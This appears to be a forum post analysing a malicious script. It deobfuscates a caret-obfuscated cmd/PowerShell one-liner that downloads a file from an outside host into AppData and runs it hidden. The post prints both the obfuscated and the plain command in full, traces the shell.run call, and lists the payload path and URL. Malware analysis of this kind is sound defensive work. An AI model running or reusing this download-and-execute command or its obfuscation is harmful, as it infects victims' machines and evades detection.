"cmd.exe /c p^owers^helL^.exe^ -eX^ecU^tIO^N^polIc^y ^By^Pa^ss^ -^n^OPr^oF^Il^e^ ^-wINdows^tyLe h^i^dd^en^ ^(new-OBj^ec^t^ system^.N^et.^webcLi^en^t).dOwnl^O^ad^FIL^e('http ://www .baaslorelab.wang/user.php?f=1.dat','%aPPdata%\eXe');s^t^aRt^-pR^O^ce^ss %apPdata%\exe"​

That means :

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .baaslorelab.wang/user.php?f=1.dat','%appdata%\exe');start-process %appdata%\exe"​

To find the run part : still the same method

- The command line deobfuscation is done by the function gwijqowy()

=> a search with notepad gives :​

var ycwomn = gwijqowy();

=> a search on ycwomn gives :​

case "62152":
if (agykiwjubs == 'undefined') {
cpohkowa["r" + "un"](ycwomn, dwecuq);
}
=> cpohkowa["r" + "un"](ycwomn, dwecuq);

var dwecuq = 0;
=> shell.run(commandLine, 0) (window style 0 : the command window is hidden)
SEE THE FIRST POST FOR EXPLANATIONS OF COMMAND LINE CONTENT

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .baaslorelab.wang/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"

Payload:

C:\Users\fredd\AppData\Roaming\eXe​

URL :

http ://www .baaslorelab.wang/user.php?f=1.dat


 
